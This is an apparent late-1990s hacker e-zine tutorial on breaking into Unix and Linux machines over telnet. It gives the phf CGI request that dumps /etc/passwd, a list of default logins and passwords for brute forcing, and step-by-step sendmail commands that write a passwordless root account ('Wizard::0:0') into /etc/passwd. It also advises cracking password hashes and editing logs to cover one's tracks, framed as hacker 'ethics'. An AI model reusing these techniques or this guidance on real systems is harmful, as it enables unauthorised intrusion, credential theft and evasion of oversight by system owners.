home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
CODBRK3.ZIP
/
cb0208.txt
< prev
next >
Wrap
Text File
|
1998-03-23
|
21KB
|
407 lines
***Hacking Unix/Linux systems***
Via Telnet
By: Techno Phunk
O.k, there has been enough virus writing things in our e-zine and
I finaly descided to jump in and talk a little about hacking
for your first lesson I am going to teach you a LITTLE about
hacking linux/unix system's via telnet, later I will teach more
about telenet (Sprintnet) and direct dialup's, and eventialy
I will teach you how to hack VAX/VMS, but not until you master
Unix/linux should you even ATTEMPT a VAX, belive me, it's for the elite's
only as it is NOT as bugy as linux/unix. anyway a little history on unix.
History
--=====--
The unix OS originated from AT&T in the early 1970's Because UNIX was able
to run on diffrent hardware from diffrent vendors, this made developers
to modify the OS and distribute their own versions. USL's (new makers) system
V, Berkeley Standar Distibution (DSD, From the university of California,
Berkley), Xenix, etc are just a few examples. Now on with the show...
The unix system/linux system has been known to have Multiple
exploits that can be used agianst them, one of which is the famous
phf bug: http://www.domain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
this bug of course is almost totaly outdated, exception of alot of the
less known .edu sites, and .gov/.net sites. Of course many other
bugs are also unique to this system such as the Sendmail bug's such
as the one where the software could send mail DIRECTLY to a file
so someone could write a extra acount to the passwd file, and gain
root acces. I personaly have a multitude of exploits that I have
put into my memory and I could use anywhere without refering to any
files. from here on, I will be telling alot more about hacking of
unix systems (and linux, there basicly the same people) from a telnet
platform, what to do, etc....
First of all, before hacking a system, examin it, and get all the
info you can get on it, finger them(port 79), Ping them, do whatever
you can to get all the info possible, think about who the sysop is, etc
just don't do any destruction as this is *LAME*, it makes you a CYBERPUNK
not a hacker, and last but not least it makes people WANT to catch you
and to spend money looking for you, also the FBI/Secret Service won't
take the case unless 1000$ of damages are done.
Now then
------
You need a good telnet program, such as the one that comes with
Win95 or my personal favorite: EWAN, anyway, any telnet software
should be fine. You will also need a ppp/slip/Winsock
connection. If you are on AOL, don't dispare it will work as long
as you use V.3.0 of AOL or above.
Now that you have found a good telnet program we can go on...
now somehow you must get a password to this system preferably
to the Sysadmin acount or Root (unfortunatly, the root account can
only be remotly accessed on Redhat linux, and some of the BSD's)
or any of the shell's (if you wish) anyway, there are several
ways to do this. first would be social engeniring, if that is possible
social engenering is quiet simple, all you must do, is trick a person
into giving you information. A leson on Social Engineering will be
covered in the next file (if I get around to it, in this issue)
Next you can pull an exploit such as the phf bug (if it hasn't allready been
taken off) and if you do
pull the phf bug, if the file looks like this:
root:*:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:*:1:1:system background account:/:
^ notice the star
then forget it, since this file is shaddowed, you will need to try
something else
but if it looks sorta like this:
root:WAdadtiA:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:dCDa2Hn:1:1:system background account:/:
(file will look SOMETHING like this) then you are home free to d/l
this and then run a pw cracker on it, yet this is not hacking yet...
in order for any type of bust in (into a computer) to become a hack
you must learn about the system, how it works and the like, since
hacking is simply a way of gathering information.
now if the phf bug or one of the many exploits works, and you get the
UNshadowed PW file, then all you must do is, crack it, write down
or save all the logins and passwords that where found(some do this for you)
I personaly use cracker jack with multiple word lists and now move on to
the next stage which will be picked up on after I tell what to do if this
doesn't work.
If no exploits work then your going to have to go with the next
part...Brute forcing and defaults
I will be nice and include one of my personal (ONE of them) lists
that I use for brute forcing. Brute forcing is covered in the latest
issue of 2600 magazine (Volume #14, 3, Autum 1997), but I will explain
this anchient art here too. Brute Forceing is basicly the act of
hamering out passwords at a specific acount name (such as in this
example: sysadmin) until you get in, this is the last resort to
get into a system that seems to have NOOO exploits or wide open
back doors. Brute forcing can be tiediosly done by hand or
simply by a script. The problem with Bruting Unix systems is that
after 3 login attempts (in most casses) will simply log you off, so
you would simply have to see how many chances you have and then
program the script accordingly. Keep in mind that all your activities
are probably going to be loged, so once you get in, modify those logs
to cover up your tracks, or use a program (avialable almost ANYWHERE).
Anyway....here is a list of default passwords and login's to try first
before you attempt a brute force. In most cases this list may work, or
then agian it may not, it just depends on the system admin IQ :).
------------------------------------------------------------------
Login: Password:
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo
SYSTEM OPERATOR
SYSTEM MANAGER
SYSTEM SYSTEM
SYSTEM SYSLIB
OPERATOR OPERATOR
SYSTEST UETP
SYSTEST SYSTEST
SYSTEST TEST
SYSMAINT SYSMAINT
SYSMAINT SERVICE
SYSMAINT DIGITAL
FIELD FIELD
FIELD SERVICE
GUEST GUEST
GUEST unpassworded
DEMO DEMO
DEMO unpassworded
TEST TEST
Note: unpassworded means to just hit enter when it prompts for a PW
-------------------------------------------------------------------
Now then, I will now cover some basic exploits, etc and the brute fource
list will be attached to the bottom of this file.
Exploits.
==========
Most exploits covered here are probably not going to work on like the
CIA, or something like that, but thease are clasic and common exploits.
If you want to see more "up to date" exploits I recomend rootshell.com
which has a NICE collection which are useful for some situations.
The following bugs will need you to have at least an IQ of 2 and
telnet/ftp/http/etc programs.
First of all I'd like to cover some of the "sendmail exploits"
One of the most famous, but usualy uncommon to work (on up-to-date systems)
in otherwords if the system your hacking is up-to-date and older, and
is updated CONSTANTLY, then chances 10-1 it won't work, but you never
know so TRY IT! never hurts to T-R-Y. When people say "teach me to hack"
I say "Trial-and-error" and that is all, what else do I need to say?
well basicly this exploit takes advantage of Sendmail's ability to
send mail DIRECTLY to files on the host system, e.g TO: /etc/passwd
anyway, what you do is basicly send mail to the passwd file and
then you login with the "unpassworded" root access'ed acount that
you create. Now since I know this is a "newbie" file I will now explain
a bit about sendmail, how to use it, what it is, it's past, future, and
it's role in the Unix/Linux/Bsd enviroment.
Sendmail which is a oviosly a SMTP program, SMTP stands for Simple Mail
Transfer Protocule if I am correct (I hit my head many times on walls and
things) anyway, basicly it allows a user to sendmail to any internet
or local user. The Sendmail program like the finger program run on a
certain port, like finger runs on port 79, and is USUALY open for remote
acces, but sendmail (port 25) is ALWAYS open, unless the user doesn't use
sendmail which that is still EXTREEMLY unusual, and only people that I know
that don't run it are fellow hackers. Anyway so in order to access it you
must *TELNET* (remember that program I told you to get) to port 25 of your
target machine, now in order to get the target machines TCP or IP you must
do a whois (or a DNS lookup) now, you may get a dns lookup/whois program
for winblows all you need is a valid internet connection, but I use either
a. a shell acount or b. internic (http://www.internic.com) c. /dns on
mIRC in other words /dns yahoo.com then it will say: Resolved yahoo.com to
then a number which is the IP, now you have the IP/TCP of you target you
must telnet to that 'host'. Now if your smart or like me, you WILL be sure
you know all the information possible about your "target". Back onto
sendmail, now when you first connect it SHOULD say SOMETHING like this:
Sendmail 8.3.2 (host) ready to go....anyway, something like that
Once you see this, hit enter (it should report something like unknown command)
this is needed since we are using a telnet program, not a SMTP program.
anyway from here you can explore the commands, type HELP, otherwise hang
with me for a few now from here to pull the exploit you do the following.
Mail FROM: root@whatever.com (this could be whatever you want)
RCPT TO: /etc/passwd
now if it says "can not send mail directly to files" then forget this exploit
then type:
data
then it should say something like:
Type your message and type a period (".") on a blank line when done
then you type:
Wizard::0:0:Super User:/:/bin/csh
.
now it should say mail excepted for delivery
now then you can change Wizard to whatever, but for a beginer, just leave
it. Now since this worked, you may now go threw "normal" telnet (port 23)
and Login would be: Wizard and then password, just hit enter, now wasn't
that easy?
Now, one more program you may want to get is called a port scanner
this will find all open ports for you and tell you what they are
now for those with trouble finding one here is a list of "cool" ports
to try out (BTW- this is from my personal collection, I don't remember
however where I got this):
note: some of thease will work on some systems, other won't (chance)
-----------------------------
tcpmux 1/tcp # rfc-1078
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp
domain 53/udp
mtp 57/tcp # deprecated
bootps 67/udp # bootp server
bootpc 68/udp # bootp client
tftp 69/udp
gopher 70/tcp # gopher server
rje 77/tcp
finger 79/tcp
http 80/tcp
www 80/tcp
link 87/tcp ttylink
kerberos 88/udp kdc
kerberos 88/tcp kdc
supdup 95/tcp # BSD supdupd(8)
hostnames 101/tcp hostname # usually to sri-nic
iso-tsap 102/tcp
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop-2 109/tcp # PostOffice V.2
pop-3 110/tcp # PostOffice V.3
pop 110/tcp # PostOffice V.3
sunrpc 111/tcp
sunrpc 111/tcp portmapper # RPC 4.0 portmapper UDP
sunrpc 111/udp
sunrpc 111/udp portmapper # RPC 4.0 portmapper TCP
auth 113/tcp ident # User Verification
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/tcp # Network Time Protocol
ntp 123/udp # Network Time Protocol
netbios-ns 137/tcp nbns
netbios-ns 137/udp nbns
netbios-dgm 138/tcp nbdgm
netbios-dgm 138/udp nbdgm
netbios-ssn 139/tcp nbssn
imap 143/tcp # imap ntwrk mail prtcl
NeWS 144/tcp news # Window System
snmp 161/udp
snmp-trap 162/udp
exec 512/tcp # BSD rexecd(8)
biff 512/udp comsat
login 513/tcp # BSD rlogind(8)
who 513/udp whod # BSD rwhod(8)
shell 514/tcp cmd # BSD rshd(8)
syslog 514/udp # BSD syslogd(8)
printer 515/tcp spooler # BSD lpd(8)
talk 517/udp # BSD talkd(8)
ntalk 518/udp # SunOS talkd(8)
efs 520/tcp # for LucasFilm
route 520/udp router routed # 521/udp too
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc # experimental
conference 531/tcp chat
netnews 532/tcp readnews
netwall 533/udp # emergency broadcasts
uucp 540/tcp uucpd # BSD uucpd(8) UUCP serv
klogin 543/tcp # Kerberos authen rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff rem filesys
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
pcserver 600/tcp # ECD Integrated PCb svr
mount 635/udp # NFS Mount Service
pcnfs 640/udp # PC-NFS DOS Authen
bwnfs 650/udp # BW-NFS DOS Authen
kerberos-adm 749/tcp # Kerberos 5adm/changepw
kerberos-adm 749/udp # Kerberos 5adm/changepw
kerberos-sec 750/udp # Kerberos authen--udp
kerberos-sec 750/tcp # Kerberos authen--tcp
kerberos_master 751/udp # Kerberos authen
kerberos_master 751/tcp # Kerberos authen
krb5_prop 754/tcp # Kerberos slave propaga
listen 1025/tcp listener RFS remote_file_sharing
nterm 1026/tcp remote_login network_terminal
kpop 1109/tcp # Pop with Kerberos
ingreslock 1524/tcp
tnet 1600/tcp # transputer net daemon
mud(2000) 2000/tcp ## Diku2 MultiUser Dimen
cfinger 2003/tcp # GNU finger
nfs 2049/udp # NFS File Service
eklogin 2105/tcp # Kerberos encrypT rlogi
mud(4000) 4000/tcp ## Diku2 MultiUser Dimen
mud(4240) 4240/tcp ## Diku2 MultiUser Dimen
mud(4242) 4242/tcp ## Diku2 MultiUser Dimen
krb524 4444/tcp # Kerberos 5 to 4 ticket
irc(6666) 6666/tcp ## Alternate IRC port
irc 6667/tcp # Internet Relay Chat
irc(6668) 6668/tcp ## Alternate IRC port
dos 7000/tcp msdos
-------------------------------------------------------------------
anyway, now, I won't list many more exploits now as there are millions of them
on the net, expspcialy around http://www.rootshell.com
now, I will go into what you do once you are in....
commands that are usefull to you at this time are going to be things like:
ls * list files
cd * change DIR note: cd .. goes back, cd / is used instead
* of the MS-DOS equivilant: cd\
who * who's online
finger * get info on a user
pico * one of the text editors
cat * display file (like type in Ms-dos)
cc * compiler for C programs (exploits ;)
that should get you started, note that this should work in C shell and in
korn shells...
Now, lastly, I hope that you have learned something from all this...
more info can be found at: http://www.angelfire.com/nc/TechnoPhunk/index.html
under the hacking page. I am trying to get more stuff on it, but there is
some other tutorials and other info there. so be sure to stop by
Now, for a word on ethics....
1. though shalt not change anything except for the logs (to cover yourself)
2. though shalt not do destruction
3. don't tell your friends/family/etc that you are a hacker
4. never tell your real name to other hackers
5. never leave behind your handle or name on a hacked server
6. be kind
that's about all for this lesson....I relise it was short, and not VERY
informative, but it should give you a start. I hope to cover more on
Unix hacking next time, possibly a bit more on the BSD's and Linux.
Send me sugestions....TechnoPhunk@thepentagon.com
- Techno Phunk